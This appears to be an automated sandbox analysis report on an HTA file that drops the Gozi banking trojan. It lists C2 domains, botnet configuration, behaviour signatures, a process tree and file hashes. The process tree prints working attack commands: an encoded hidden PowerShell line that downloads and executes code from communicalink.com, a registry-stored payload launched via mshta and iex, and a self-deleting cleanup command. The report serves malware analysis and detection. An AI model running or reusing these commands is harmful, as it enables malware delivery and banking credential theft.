Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    06-10-2023 11:56

General

  • Target

    client_5.hta

  • Size

    22KB

  • MD5

    988f8a03ac893e41d4f9aaca5addafe1

  • SHA1

    d3bda7e7be11da19cd3adf16a4c58548eb573f74

  • SHA256

    0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf

  • SHA512

    2dd80008e91d35da4d60572be008ab60ae7edd5ebe5b94518c3bfb3aa573c812e2abeb3c7d4033ca9cf5b99e64db5537c79b3e6aae8bd89e894de7fcc2a5b1c1

  • SSDEEP

    384:pA7lUDQMeK43MV0p6WUuJOJjmF9Koq5nZN851z9fwP3jXMeSnqIc6l:H2MWqwRwPDd6l

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

systemcheck.top

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_5.hta"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2392
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2672
          • C:\Users\Admin\AppData\Local\Temp\KUYSsdW.exe
            "C:\Users\Admin\AppData\Local\Temp\KUYSsdW.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2700
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Q8cw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Q8cw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\4A3E94A1-2199-0CE0-FB1E-E5005F32E934\\\PlayContact'));if(!window.flag)close()</script>"
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vfmbyls -value gp; new-alias -name dxkiflhnm -value iex; dxkiflhnm ([System.Text.Encoding]::ASCII.GetString((vfmbyls "HKCU:Software\AppDataLow\Software\Microsoft\4A3E94A1-2199-0CE0-FB1E-E5005F32E934").PlayChar))
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2516
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4z7mcy_e.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC19A.tmp"
            5⤵
              PID:268
          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ke4rnuiq.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC2F1.tmp"
              5⤵
                PID:1628
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\KUYSsdW.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2036
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2396
        • C:\Windows\syswow64\cmd.exe
          "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
          2⤵
            PID:1780

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Defense Evasion

        Modify Registry

        1
        T1112

        Discovery

        System Information Discovery

        1
        T1082

        Remote System Discovery

        1
        T1018

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\4z7mcy_e.dll
          Filesize

          3KB

          MD5

          8b4c23275c0ef5b0528e328d22752710

          SHA1

          f4e7e80e717bce51894bce89a8bb39f4b5d5b311

          SHA256

          eae9e0cdc3f3f03bb52c7e3272bd769e54d4f7a6ad2db5b7c91320c3267c3c73

          SHA512

          57ba218df52c8ff9ec05d0c4ec3d6c91048e4e294564f493b22085007be984faba1f6ccf2b39aa2ee18ac50fb03bb0e742978b2d0d1268532013caa14c9a8e81

        • C:\Users\Admin\AppData\Local\Temp\4z7mcy_e.pdb
          Filesize

          7KB

          MD5

          b026403ce031d11530004252b3067483

          SHA1

          5f27517d47a0cf85464f10b680961a9fdd2ed455

          SHA256

          fcdb536170d7184a18525ab0fa42ffdbf194ba74c517879f3309d1ac43692419

          SHA512

          fa4e7484905f2dc01ed9feea77aebc62636b3031bec1b46becc305b5d0589a33e08cd15ff506e5ddf8658a1623c6a0abf12c1208bcd930489bc17af3e6e4b5c0

        • C:\Users\Admin\AppData\Local\Temp\KUYSsdW.exe
          Filesize

          293KB

          MD5

          01435632dca9afc151eec77862bfbc2b

          SHA1

          9bbb4ae83131fafcd14d580810b14f48d2d30837

          SHA256

          2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

          SHA512

          61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

        • C:\Users\Admin\AppData\Local\Temp\KUYSsdW.exe
          Filesize

          293KB

          MD5

          01435632dca9afc151eec77862bfbc2b

          SHA1

          9bbb4ae83131fafcd14d580810b14f48d2d30837

          SHA256

          2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

          SHA512

          61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

        • C:\Users\Admin\AppData\Local\Temp\KUYSsdW.exe
          Filesize

          293KB

          MD5

          01435632dca9afc151eec77862bfbc2b

          SHA1

          9bbb4ae83131fafcd14d580810b14f48d2d30837

          SHA256

          2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

          SHA512

          61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

        • C:\Users\Admin\AppData\Local\Temp\RESC1AB.tmp
          Filesize

          1KB

          MD5

          17a01fd4603fb5c47625c993a2058d35

          SHA1

          28c80a5bff04ceda4834e34c99c2f20873c34c8b

          SHA256

          3b36ef52c44b85b746de09b676f791c6e3f114c15a774b9ad298076038d1fd50

          SHA512

          b2d67af6bc400b8f1e7b95d11dc54bf5b79bf15075a5a6bd943db53b697c52ca48afe012feb5045157afd5199e12d889a0e32e10ac86b6cf0161fe1b10dceb82

        • C:\Users\Admin\AppData\Local\Temp\RESC2F2.tmp
          Filesize

          1KB

          MD5

          2133929abd6ead7385ffd3db9dcf39ff

          SHA1

          69ed7eaa66c3a25ceb2c554c9626b30f558b6428

          SHA256

          2090630d08b047fffd827d6b5fa3c4764f6967a2f7212ab82422f5568a2e035d

          SHA512

          bfa41acd4eaca1dee7e48b8ecb9eb57d2b5a5425bc13f9d591a6aab7395d94134e25bb6ee161e1039d0b44c520cb8a1d0f8b46a68b11b7da4182ff8afbc60a7c

        • C:\Users\Admin\AppData\Local\Temp\ke4rnuiq.dll
          Filesize

          3KB

          MD5

          075c4463aee1de67ef86f6bf16ee68fa

          SHA1

          ac543d274591d389724ee0451915e40e06700c6c

          SHA256

          84bac1fc0e8897efe2b43589aeb997db90a64f60f62ee960b641f7cc86571f21

          SHA512

          982538785075a9187ac31b59970d1e2db80851440137f59b403b52c4300967f2fdebc872d20374d0221b850bcfbee80e6cd6a86a58b5e94dba3025bc8cf42c9e

        • C:\Users\Admin\AppData\Local\Temp\ke4rnuiq.pdb
          Filesize

          7KB

          MD5

          60d05446f9118019d6f0656b5c3a9ad7

          SHA1

          816300e8dad262408040b0d9d3c505d4ea57b6e4

          SHA256

          ce807865f20056b11d131e2daf336fa3fd857087e1e6121b1933b62f119ae401

          SHA512

          97180b9294499e63cffcdd0bedf0d313d2c305524812680f8c35d723a49162c675b6b0e512c4aa1f2dbcc11f6a36e3c94429d34e6a77009beee2938d04f3287a

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R3X5ZHQW5ANWQNRNZMJZ.temp
          Filesize

          7KB

          MD5

          e6315d119c1a3c6cec27d0a8f62d72d2

          SHA1

          061bba968d58f4ca8c9645841e50afc31c681c39

          SHA256

          5a8a7a10202fb486df2a9f225329e35b6b298963cbcb5f00dda8c7dc332870cc

          SHA512

          de00a569886d9cc7c81a58c7cd1417d176e80b6ae6367f4b0db3d3d895c209b9bb46f9a389192cd9abf8dd9d3d234f5ba7d26768ff6ee1c9ef86111a1e2300ea

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \??\c:\Users\Admin\AppData\Local\Temp\4z7mcy_e.0.cs
          Filesize

          405B

          MD5

          caed0b2e2cebaecd1db50994e0c15272

          SHA1

          5dfac9382598e0ad2e700de4f833de155c9c65fa

          SHA256

          21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

          SHA512

          86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

        • \??\c:\Users\Admin\AppData\Local\Temp\4z7mcy_e.cmdline
          Filesize

          309B

          MD5

          76c5c6548b8e516b9db14ff87909c0f7

          SHA1

          ed8c7c7abe43f2b82f9f6001977001e26ec0c79f

          SHA256

          82a4102425945c0239ac805ccd1a6034c2cd512eb89445a0a7f77d2d62f8abf8

          SHA512

          44d1b88c7ef1cd0624f762e9ba64493da8dd9811adc09653c103e9f390737d458657535d8e4ec19178719c3d1b54a6309a1d82f535227dd1515ce94348c5cd91

        • \??\c:\Users\Admin\AppData\Local\Temp\CSCC19A.tmp
          Filesize

          652B

          MD5

          aa080e0c64635548f868a7efa6183b09

          SHA1

          ee4287c4ab0626a98cb201c9f466198e920390fc

          SHA256

          1041af0f82f06ac17f66d6c1bcc839455176b6ec7dfdb3f3ae449b8f73d1caef

          SHA512

          7d203fa9474fa51cc56061ad7fb5e186934c99d9c815d87f8aa5aefdb81636dab19a8e4d773cf2465e8d03b242561adc09d1551cdbed7e8ee58d61d5d48d1262

        • \??\c:\Users\Admin\AppData\Local\Temp\CSCC2F1.tmp
          Filesize

          652B

          MD5

          d8d9d7111ae0102af38c1ff3a658ba33

          SHA1

          540e7576c71f187736b96c983676c089a7185f10

          SHA256

          346a9adcfcc5809fda08dc78086dc9c35b06178a4ed6774abf707013307e2c3d

          SHA512

          deef7574f4b72595986188201f623f3d1e2daf126bd565e4dc663fc522c405d0a4b9b71f95251d4eadf158ae740ca075a6e0befd6232089b098c3bd278565f8c

        • \??\c:\Users\Admin\AppData\Local\Temp\ke4rnuiq.0.cs
          Filesize

          406B

          MD5

          ca8887eacd573690830f71efaf282712

          SHA1

          0acd4f49fc8cf6372950792402ec3aeb68569ef8

          SHA256

          568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

          SHA512

          2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

        • \??\c:\Users\Admin\AppData\Local\Temp\ke4rnuiq.cmdline
          Filesize

          309B

          MD5

          9a5909726bf5f4387d6e2faa1d3f1442

          SHA1

          e996ef089e2a9a83722f13ebe2365b19b53a82f7

          SHA256

          501ee482628fc262ca1be79818a4607910043bc3c99dec996bcfcf38031fda4a

          SHA512

          3265d5db5a0b43aed54c37fb87d03fe35ecc001c8fe572c1fc18a463b68cf68602a4b368280da604ae66b60dd38feb4e07975d6b53964bbd98185f11aa3f777f

        • \Users\Admin\AppData\Local\Temp\KUYSsdW.exe
          Filesize

          293KB

          MD5

          01435632dca9afc151eec77862bfbc2b

          SHA1

          9bbb4ae83131fafcd14d580810b14f48d2d30837

          SHA256

          2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

          SHA512

          61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

        • \Users\Admin\AppData\Local\Temp\KUYSsdW.exe
          Filesize

          293KB

          MD5

          01435632dca9afc151eec77862bfbc2b

          SHA1

          9bbb4ae83131fafcd14d580810b14f48d2d30837

          SHA256

          2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

          SHA512

          61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677

        • memory/1232-85-0x0000000002A90000-0x0000000002A91000-memory.dmp
          Filesize

          4KB

        • memory/1232-83-0x0000000003FF0000-0x0000000004094000-memory.dmp
          Filesize

          656KB

        • memory/1232-118-0x0000000003FF0000-0x0000000004094000-memory.dmp
          Filesize

          656KB

        • memory/1780-111-0x00000000001E0000-0x00000000001E1000-memory.dmp
          Filesize

          4KB

        • memory/1780-114-0x0000000000430000-0x00000000004C8000-memory.dmp
          Filesize

          608KB

        • memory/1780-110-0x0000000000430000-0x00000000004C8000-memory.dmp
          Filesize

          608KB

        • memory/2036-97-0x0000000000340000-0x00000000003E4000-memory.dmp
          Filesize

          656KB

        • memory/2036-96-0x000007FFFFFD3000-0x000007FFFFFD4000-memory.dmp
          Filesize

          4KB

        • memory/2036-102-0x0000000000340000-0x00000000003E4000-memory.dmp
          Filesize

          656KB

        • memory/2036-101-0x0000000000110000-0x0000000000111000-memory.dmp
          Filesize

          4KB

        • memory/2036-121-0x0000000000340000-0x00000000003E4000-memory.dmp
          Filesize

          656KB

        • memory/2396-104-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp
          Filesize

          4KB

        • memory/2396-105-0x0000000001B20000-0x0000000001BC4000-memory.dmp
          Filesize

          656KB

        • memory/2396-119-0x0000000001B20000-0x0000000001BC4000-memory.dmp
          Filesize

          656KB

        • memory/2396-106-0x0000000000090000-0x0000000000091000-memory.dmp
          Filesize

          4KB

        • memory/2516-88-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp
          Filesize

          9.6MB

        • memory/2516-42-0x0000000002310000-0x0000000002318000-memory.dmp
          Filesize

          32KB

        • memory/2516-41-0x000000001B190000-0x000000001B472000-memory.dmp
          Filesize

          2.9MB

        • memory/2516-48-0x00000000028E0000-0x0000000002960000-memory.dmp
          Filesize

          512KB

        • memory/2516-47-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp
          Filesize

          9.6MB

        • memory/2516-79-0x000000001B610000-0x000000001B618000-memory.dmp
          Filesize

          32KB

        • memory/2516-46-0x00000000028E0000-0x0000000002960000-memory.dmp
          Filesize

          512KB

        • memory/2516-82-0x000000001B630000-0x000000001B66D000-memory.dmp
          Filesize

          244KB

        • memory/2516-84-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp
          Filesize

          9.6MB

        • memory/2516-44-0x00000000028E0000-0x0000000002960000-memory.dmp
          Filesize

          512KB

        • memory/2516-45-0x00000000028E0000-0x0000000002960000-memory.dmp
          Filesize

          512KB

        • memory/2516-43-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp
          Filesize

          9.6MB

        • memory/2516-90-0x000000001B630000-0x000000001B66D000-memory.dmp
          Filesize

          244KB

        • memory/2516-63-0x000000001B600000-0x000000001B608000-memory.dmp
          Filesize

          32KB

        • memory/2672-24-0x00000000743C0000-0x000000007496B000-memory.dmp
          Filesize

          5.7MB

        • memory/2672-12-0x00000000743C0000-0x000000007496B000-memory.dmp
          Filesize

          5.7MB

        • memory/2672-13-0x0000000002540000-0x0000000002580000-memory.dmp
          Filesize

          256KB

        • memory/2672-11-0x00000000743C0000-0x000000007496B000-memory.dmp
          Filesize

          5.7MB

        • memory/2672-14-0x0000000002540000-0x0000000002580000-memory.dmp
          Filesize

          256KB

        • memory/2700-33-0x0000000000400000-0x000000000228F000-memory.dmp
          Filesize

          30.6MB

        • memory/2700-28-0x00000000002C0000-0x00000000002CD000-memory.dmp
          Filesize

          52KB

        • memory/2700-27-0x0000000000400000-0x000000000228F000-memory.dmp
          Filesize

          30.6MB

        • memory/2700-26-0x0000000002460000-0x0000000002560000-memory.dmp
          Filesize

          1024KB

        • memory/2700-30-0x0000000000220000-0x000000000022B000-memory.dmp
          Filesize

          44KB

        • memory/2700-32-0x0000000002460000-0x0000000002560000-memory.dmp
          Filesize

          1024KB

        • memory/2700-35-0x0000000003C40000-0x0000000003C42000-memory.dmp
          Filesize

          8KB

        • memory/2704-54-0x00000000020E0000-0x0000000002160000-memory.dmp
          Filesize

          512KB